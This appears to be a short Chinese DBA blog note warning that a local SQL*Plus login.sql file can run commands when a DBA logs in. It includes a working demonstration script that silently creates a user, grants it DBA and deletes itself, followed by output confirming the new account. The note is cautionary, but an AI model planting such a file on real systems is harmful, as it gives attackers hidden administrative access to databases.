[20140221]login.sql与系统安全.txt
--昨天帮别人解决问题,因为显示的问题我需要调整linesize的设置.我发现我的改动不生效.
--仔细检查才发现在本地目录有一个login.sql.
--因为机器是别人的,我突然想到login.sql引起的安全问题.
--如果我在login.sql包含如下内容结果如下呢?
set feedback off
set termout off
create user test1 identified by test1;
grant dba to test1;
set feedback on
host rm ~/login.sql
--以一个dba用户登录:
SCOTT@test> select username from dba_users where username='TEST1';
USERNAME
------------------------------
TEST1
1 row selected.
--退出.
$ ll login.sql
ls: login.sql: No such file or directory
$ sqlplus test1/test1
SQL*Plus: Release 11.2.0.3.0 Production on Fri Feb 21 10:12:51 2014
Copyright (c) 1982, 2011, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options
--看来在提供的机器使用要注意这些细节问题.特别是使用别人的机器访问自己的服务器.